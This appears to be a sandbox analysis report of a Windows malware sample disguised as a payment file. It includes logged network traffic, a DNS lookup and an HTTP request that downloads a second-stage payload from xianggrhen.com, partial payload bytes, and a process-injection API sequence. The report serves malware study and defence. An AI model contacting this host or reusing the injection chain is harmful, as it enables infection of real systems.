Dec 6, 2024 11:05:33.026963949 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.027039051 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.027091026 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.028016090 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.028120041 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.028171062 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.029135942 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.029289961 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.029340029 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.030216932 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.030347109 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.030396938 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.031285048 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.031368971 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.031416893 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.032366991 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.032506943 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.032574892 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.033442020 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.033574104 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.033626080 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.034533024 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.034650087 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.034698963 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.035655975 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.035761118 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.035808086 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.036756992 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.036770105 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.036813974 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:35.630882978 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:35.633543015 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:06:02.401103020 CET	49708	80	192.168.2.10	45.9.191.182

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 11:05:29.002383947 CET	53416	53	192.168.2.10	1.1.1.1
Dec 6, 2024 11:05:29.330596924 CET	53	53416	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2024 11:05:29.002383947 CET	192.168.2.10	1.1.1.1	0xf4eb	Standard query (0)	xianggrhen.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 6, 2024 11:05:26.801314116 CET	1.1.1.1	192.168.2.10	0x3285	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2024 11:05:26.801314116 CET	1.1.1.1	192.168.2.10	0x3285	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 6, 2024 11:05:29.330596924 CET	1.1.1.1	192.168.2.10	0xf4eb	No error (0)	xianggrhen.com		45.9.191.182	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

xianggrhen.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49708	45.9.191.182	80	7724	C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 11:05:29.461133957 CET	83	OUT	GET /camp/Reibbfkkyy.dat HTTP/1.1 Host: xianggrhen.com Connection: Keep-Alive
Dec 6, 2024 11:05:30.698776007 CET	267	IN	HTTP/1.1 200 OK etag: "13e408-6752bd24-17b249;;;" last-modified: Fri, 06 Dec 2024 09:00:20 GMT content-type: application/octet-stream content-length: 1303560 accept-ranges: bytes date: Fri, 06 Dec 2024 10:05:30 GMT server: LiteSpeed connection: Keep-Alive
Dec 6, 2024 11:05:30.698884964 CET	1236	IN	Data Raw: 95 4f 86 fe de cf 7c 86 b4 d1 ce bb 6a bc 46 ab 49 55 f2 6d 1b 23 9b ce d6 15 ef 93 34 e2 eb 6d 37 35 94 03 b7 12 59 0d 05 4d fc 90 5c c6 87 8c 3c 3d b7 cd 05 c1 69 fc 5b c2 1a 55 bb 62 0d 47 8c 5c 05 5f 48 46 40 3f cf 05 f3 96 94 09 46 06 82 a2 Data Ascii: O\|jFIUm#4m75YM\<=i[UbG\_HF@?Fu#{zy^bxqf<%]s7~k^LjtNI]?qJ/O4QgoDb=;z^{Cb.QB]R3"M*< j]T-FmJd
Dec 6, 2024 11:05:30.698945999 CET	1236	IN	Data Raw: 8b b4 11 ec 9b 29 7e d1 cc 87 6b 3a fb 84 a0 b2 61 35 38 a6 63 b5 cc 97 12 aa 24 a4 9c be 53 a1 bf fd b5 0b 23 d0 ef b9 25 80 6e 58 a4 b4 b9 16 ff 18 29 76 75 fe fd 1e cf a5 2d 36 5d b5 8b bb dc 1c 66 98 39 c8 1a 2c 75 23 d6 51 59 63 d5 93 55 cf Data Ascii: )~k:a58c$S#%nX)vu-6]f9,u#QYcUOI_VxY#LU'@30O^TIx1CghuBL9_!^,pox,CR(#0kOMJqZ%sIdY=Wl6y*(V
Dec 6, 2024 11:05:30.698959112 CET	448	IN	Data Raw: 94 33 06 95 42 f2 ed da cf b0 e8 27 f8 2d f0 b9 73 a0 02 ee 98 d2 62 eb a0 b2 31 06 58 42 52 19 cf 12 a3 16 4d ee b5 f3 8a 81 4f e8 f3 82 9c 14 ce 1f f0 62 f9 40 3f e8 0b dd 33 20 f7 eb 6e b5 ea 4f fe 01 8a 09 12 17 72 61 4d c4 ad 7f 4b b0 b8 7c Data Ascii: 3B'-sb1XBRMOb@?3 nOraMK\|7Ty86#6e]0J`T2sfex~ocQ.D>qXrhy;[3fC`Vz*D?.\YOPu``%c.`/Ynz6P3 a,
Dec 6, 2024 11:05:30.698971987 CET	1236	IN	Data Raw: 7b 5f 7a 30 ad 81 09 d5 b6 06 a9 84 56 32 c5 29 c3 37 1c 81 bc bf ec 69 70 87 6e 2b 65 96 70 c8 e4 7a ba dd 9f 5d 5e 57 7c ea 2b 3d 85 78 be f7 fc 54 aa 3b 8d 3e 3a d4 6c c8 a4 87 6f 97 a6 8a 78 48 eb fd 41 e1 1c 8c 9e e6 21 56 20 f3 ff c2 75 fb Data Ascii: {_z0V2)7ipn+epz]^W\|+=xT;>:loxHA!V u_WD!s"y95A$>@Tuh?aOeY2smeo{ qJPuoE8D9;i3Q43 K02wbD^Ko'e:rw,V'a
Dec 6, 2024 11:05:30.699047089 CET	1236	IN	Data Raw: 72 60 c2 26 47 c9 c4 e2 be 64 4b e4 77 05 78 1a bf 4b 7a 78 0f 5d 30 0b 0a ec a8 35 ea 8a 34 1e 89 a3 cf 0f ed 56 3f 96 a0 bd 1c e2 3c ed 78 1a 86 ce 32 1b 26 c9 a0 33 08 fd 31 f5 3e 3f 0e 98 bc 46 01 c8 a7 93 7c cb 2f 7c cd c1 08 7a 99 8f a6 c3 Data Ascii: r`&GdKwxKzx]054V?<x2&31>?F\|/\|z&}l43l}8YiFWQX[o`>?c79q06#&MAQjw{yI>;[{lx&h ja+Ug-tib
Dec 6, 2024 11:05:30.699111938 CET	1236	IN	Data Raw: 74 48 35 61 6a 69 3a 42 66 f4 52 5e 2c a9 05 df 67 f3 b6 c9 89 30 f0 54 ee 90 8d ea e0 a6 7d 5b 3d 10 93 0e e2 98 a2 f0 98 b3 ab 7d 06 32 33 66 b8 78 2d 7c 73 41 9e 40 bb fb 7f bd cd 6d 70 25 a0 7b d7 c3 ec 9e 42 8c ac 18 4a 9a 0c b8 0b 35 c9 2a Data Ascii: tH5aji:BfR^,g0T}[=}23fx-\|sA@mp%{BJ5LTA`q?z@osz-n3Yhsv?,5X{Xrh-RRfNJcRz"e9FVWU8Y-wgzo?5tn'u_!U\^
Dec 6, 2024 11:05:30.699126005 CET	1236	IN	Data Raw: 35 92 d9 f0 48 0d b7 f1 0c ae ba 6a 82 1f 2d 58 bb cc d4 4d e7 58 2a de fc e3 92 2f 8d dd 82 da 9e c8 8f 5b 87 d7 d9 20 eb 83 56 7b a5 c5 00 1b 46 79 a8 79 3d 4a f3 65 70 88 66 3a 96 7a f7 4c 4e e0 b5 06 92 a8 bd 03 6b 98 e7 0c c6 55 b6 95 ed 34 Data Ascii: 5Hj-XMX/[ V{Fyy=Jepf:zLNkU4r[!T4\|]VRyTL!1Z1H!=j!^n[pUa,s^{#q/Xfx?+h/sDS<\{:X}pPhQT!@]sWWj*
Dec 6, 2024 11:05:30.699137926 CET	1236	IN	Data Raw: 0d 24 70 c5 bc bc 2f 62 87 6a 19 05 ab 8b 59 5a 52 33 70 72 46 da ff 83 dc 91 3b 49 3f 3f cd 2d c9 3c 57 bf cf b6 ee d7 29 52 3d 34 1d b3 25 fd d5 ae 59 cc cb 98 c0 9a 5d b4 ba 9c 9c fe 75 f0 67 e8 ac 2d 0b cb df 98 2b 4b d8 04 8b 1f fc 3b b5 c3 Data Ascii: $p/bjYZR3prF;I??-<W)R=4%Y]ug-+K;2t[#!-y%meB-]8:?>1\!!:!isAj"4RIP01?[[")L0TF!U'lzy'E{-#mGc7nJ%q
Dec 6, 2024 11:05:30.699150085 CET	1236	IN	Data Raw: fc 4f cb ef 57 5b 24 8d 47 c9 31 d4 05 26 f9 3b 47 ac 4b a8 b7 af 25 ba c4 96 85 b6 65 35 94 9c 50 8d b4 f1 4f d4 70 8f 7a b7 f2 5d 2e 31 d6 e9 ca a3 f2 8b 0e 7d 3f 8a be ac 7a 68 49 0f de df 13 01 10 9f 8d a1 fc 61 e9 9f c6 50 24 b4 49 fc 30 f2 Data Ascii: OW[$G1&;GK%e5POpz].1}?zhIaP$I0{5ECQI1q:=]n'xt0;P`Xca[hOHdU~Qc}g`&/ikT+<k*#;!sBZ^y(k6xGNd~nc
Dec 6, 2024 11:05:30.820609093 CET	1236	IN	Data Raw: d8 69 f7 c3 59 b2 f9 c3 53 6c c7 44 f5 95 ac 19 62 74 f3 e2 bc cf 30 ac 65 4d c7 29 d3 ea e1 22 8f 99 4d 94 24 28 72 ff d7 f7 56 36 03 63 e7 0a cf 6b 4b dd 62 a1 91 18 d1 c4 c7 9a dc 96 5b 17 fa 84 7b af 63 23 08 03 fd 05 45 cf c4 d5 0c 27 81 74 Data Ascii: iYSlDbt0eM)"M$(rV6ckKb[{c#E'tKPJ(?,d07"+t+"kR<\|>dKp%fc@V,;\|RxzP7w-\|POSeuB@kiZr"F!gz(ya^[t

Target ID:	0
Start time:	05:05:27
Start date:	06/12/2024
Path:	C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe"
Imagebase:	0x400000
File size:	1'845'544 bytes
MD5 hash:	622B4FB4E2D8E9A803F526A77C867590
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1644753165.00000000065B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:05:59
Start date:	06/12/2024
Path:	C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe"
Imagebase:	0x2c0000
File size:	1'845'544 bytes
MD5 hash:	622B4FB4E2D8E9A803F526A77C867590
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	05:05:59
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8140 -s 1168
Imagebase:	0x790000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	33.3%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Executed Functions

Function 027EE3C0 Relevance: 4.7, Strings: 3, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xbq, xrefs: 027EE4ED
Teq, xrefs: 027EEAE3
pq, xrefs: 027EEF7A

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID: Teq$pq$xbq
API String ID: 0-2374184423
Opcode ID: 503dc0c33931174630e79ba0cc95fbf4b3e9f643986dde1ba14b49957af2506d
Instruction ID: 210c9091b61a314c0da861779b9be015b27c6bac5c9a034f889994cc10102dc6
Opcode Fuzzy Hash: 503dc0c33931174630e79ba0cc95fbf4b3e9f643986dde1ba14b49957af2506d
Instruction Fuzzy Hash: 11A2D574A00228CFDB64CF69C884B99BBB2FF89314F1581E9D509AB325DB319E81CF50

Function 05650F30 Relevance: 1.9, Strings: 1, Instructions: 618
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 0565104A

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: d2206f283001a251ae31b09fa7b6b905a0778eb35b8f0308eabe44d5476e630c
Instruction ID: be559a0fbcfe0bf96861160a72264d62c86d0083024f328c0509bd3ad09628f2
Opcode Fuzzy Hash: d2206f283001a251ae31b09fa7b6b905a0778eb35b8f0308eabe44d5476e630c
Instruction Fuzzy Hash: BA52D875E006298FDB64DF69C854AD9B7B2FF89310F1085EAD809A7354DB30AE85CF90

Function 05654520 Relevance: 1.6, APIs: 1, Instructions: 64
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 056545B1

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 5da8847746d68f42c1a5aaba1688fedd3db548eb465285b3b8c4ca264d44f24d
Instruction ID: d6aa2cf2be6043f8d94ee925ee01d37035646243ba34ecc1c68e7bd78f03eadb
Opcode Fuzzy Hash: 5da8847746d68f42c1a5aaba1688fedd3db548eb465285b3b8c4ca264d44f24d
Instruction Fuzzy Hash: CE21F0B5D003099FDB10CFAAD580BEEFBF5BF48220F20842AE959A7210C7759941CBA4

Function 05654528 Relevance: 1.6, APIs: 1, Instructions: 63
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 056545B1

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d19e319a19fc8135ccb49772028283b910afd2dacec9253f1af84556524e50e8
Instruction ID: cf4282aa01b32e5c2d8c5d474be0e6cf259d9ec1f442384767b00e0c743dcec7
Opcode Fuzzy Hash: d19e319a19fc8135ccb49772028283b910afd2dacec9253f1af84556524e50e8
Instruction Fuzzy Hash: E321F3B1D003499FDB10DFAAD580BAEFBF5FF48310F10842AE919A7210C775A941CBA0

Function 05656678 Relevance: 1.6, APIs: 1, Instructions: 56
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL(?,?), ref: 056566EE

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d59c5b06a71cb078a2da3a28776aff0124f8492a4a37256f2e0cc5168955b82d
Instruction ID: 81b75eaff4f29002b8799e57ffe79e11e0534fe6929f95c4cb530f2eb2cc1e0d
Opcode Fuzzy Hash: d59c5b06a71cb078a2da3a28776aff0124f8492a4a37256f2e0cc5168955b82d
Instruction Fuzzy Hash: 0A1167B1D003088FDB20DFAAC485BEEFBF4BF48220F14852AD859A7240C7749945CFA1

Function 05656680 Relevance: 1.6, APIs: 1, Instructions: 54
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL(?,?), ref: 056566EE

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d3dc86629f7da73e03f9f194140b0652bcef7f64445f0fd2d4ea6cf4d7863c72
Instruction ID: 19a3614d49d9fc9e85d073674623f00913c4530b4aa7103773d0f79d0b35733d
Opcode Fuzzy Hash: d3dc86629f7da73e03f9f194140b0652bcef7f64445f0fd2d4ea6cf4d7863c72
Instruction Fuzzy Hash: 2F1129B1D003498FDB20DFAAC4847AEFBF4FF48224F50842AD859A7240CB75A945CFA5

Function 05650F21 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

h, xrefs: 0565103E

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 688626fb828b82e2427b28c18501453b5169c79e8e08e79219e63f14a2a564c2
Instruction ID: ff5f2693bb3c6ed68a40309262f108939c8e919498f745cb769ab724d353fce0
Opcode Fuzzy Hash: 688626fb828b82e2427b28c18501453b5169c79e8e08e79219e63f14a2a564c2
Instruction Fuzzy Hash: 0B71E875E006298BEB64DF69C844BDAB7B2FB89310F1081EAD509A7354DB305E85CF90

Function 06F2E740 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1645566403.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f10000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a117d62098764e69c1e141783d7116e2fadc3e234664d8a74ebdc5361047dfc
Instruction ID: 29e6d1fedaa9e6b581d76257e59267d7fb0a07298818607d9a986006925e813f
Opcode Fuzzy Hash: 8a117d62098764e69c1e141783d7116e2fadc3e234664d8a74ebdc5361047dfc
Instruction Fuzzy Hash: 9FD1AE74E00618CFDB54DFA9D994B9DBBF2BF89300F2481A9D409AB365DB31A981CF50

Function 027EF6B0 Relevance: 1.8, Strings: 1, Instructions: 531
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(_q, xrefs: 027EF93D

Memory Dump Source

Source File: 00000000.00000002.1626452399.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27e0000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID:
String ID: (_q
API String ID: 0-3590916094
Opcode ID: 3d9faf3772a6c7e697a2f22aa06d5eac6b1c27f42acb7421d38bfef1e9471f19
Instruction ID: d86205148b78e626757ee32f55b5844df5d99ffc16a28effdc0f374cfc476474
Opcode Fuzzy Hash: 3d9faf3772a6c7e697a2f22aa06d5eac6b1c27f42acb7421d38bfef1e9471f19
Instruction Fuzzy Hash: CB227A35A002149FDB14DF69D495A6DBBF2BF88304F188069E906EB7A5CB71ED40CBA1

Function 05654F7F Relevance: 1.7, APIs: 1, Instructions: 202
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05655162

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e957b6385dc243c374ecb64709278a7d28925f658f9deca947229b3119c055ad
Instruction ID: 8771d6e0ea6169ff7390df6e23e4bd64543226677657f163906d7f2d0552cbbd
Opcode Fuzzy Hash: e957b6385dc243c374ecb64709278a7d28925f658f9deca947229b3119c055ad
Instruction Fuzzy Hash: FE812671D006599FDB20DFA9C8897AEBBF2BF48324F148529EC56A7740E7758881CF81

Function 05654F88 Relevance: 1.7, APIs: 1, Instructions: 201
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05655162

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 46a8431be75ff8578ed1d0b763a66d940e7742b7f89fc305cdc9a9a271ecd248
Instruction ID: 8815107e1af3653181c27161800991affb1462a4ab66015ad3d56d04aedc9a35
Opcode Fuzzy Hash: 46a8431be75ff8578ed1d0b763a66d940e7742b7f89fc305cdc9a9a271ecd248
Instruction Fuzzy Hash: BD812671D002599FDB20DFA9C8897AEBBF2BF48324F148129EC56A7740E7758881CF81

Function 05655FF3 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05656088

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 13ed2ae632bbb9dd8d30ff9d3eeb68d5009c67e6243e96bb3a84bba018b9b223
Instruction ID: 8eb05c6c31cd5f61e37f91ac82b20fa96f94736b7117d222651b01a497ad23f6
Opcode Fuzzy Hash: 13ed2ae632bbb9dd8d30ff9d3eeb68d5009c67e6243e96bb3a84bba018b9b223
Instruction Fuzzy Hash: 0D2148719003099FDB10DFA9C981BEEBBF5FF48314F508429E959A7250C7799941CBA4

Function 05655FF8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05656088

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 82a9332b24725c30b0803fbf472f2bda1079928c3df27cf4e089b29f9929ac81
Instruction ID: 9dac83887cb7a9e7e98eae52fe6f203c4d14ffa60e6b03a12ae7be9b72d3ee27
Opcode Fuzzy Hash: 82a9332b24725c30b0803fbf472f2bda1079928c3df27cf4e089b29f9929ac81
Instruction Fuzzy Hash: 4B2157719003099FDB10CFA9C981BEEBBF5FF48324F10842AE959A7250C7799941CBA4

Function 05655743 Relevance: 1.6, APIs: 1, Instructions: 64
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056557C6

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 864eeb65802393ba1e2295674488dfc40f23aa0b0b793deb7596ec93e0f0e8f6
Instruction ID: 8f748910a8018b31adb0ee26848bea1541e856e0a1a6b1b4653b37ea6e54a0e2
Opcode Fuzzy Hash: 864eeb65802393ba1e2295674488dfc40f23aa0b0b793deb7596ec93e0f0e8f6
Instruction Fuzzy Hash: AA213471D003098FDB10DFAAC4857EEBBF4EF48224F14842AD85AA7641CB78A945CBA4

Function 05655748 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056557C6

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: cd41a1ad1a507e68e381d8b6f7bd15fb3f1c48850af82675f2c4b48383e3575f
Instruction ID: dea1f536014dfeda01a86533da6f277afab195b84e98f6c722fba04ad98dd75c
Opcode Fuzzy Hash: cd41a1ad1a507e68e381d8b6f7bd15fb3f1c48850af82675f2c4b48383e3575f
Instruction Fuzzy Hash: 60211575D003098FDB10DFAAC4857EEBBF4EF48224F14842AD85AA7640CB78A945CFA5

Function 05655D4B Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05655DBE

Memory Dump Source

Source File: 00000000.00000002.1641964482.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5650000_MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6ac728a35e5a79a6cc01f1e495097a518790abbb8c59d5f9af1b076c1ad898fc
Instruction ID: e00fa5cb3a86d7340b050347e679c7c5693c14e1287c8ab3b7aa15d4414911f9
Opcode Fuzzy Hash: 6ac728a35e5a79a6cc01f1e495097a518790abbb8c59d5f9af1b076c1ad898fc
Instruction Fuzzy Hash: 19116A729003499FDB20DFAAC845BEEBBF5FF48324F148419E915A7250CB75A540CFA4

Function 05655D50 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

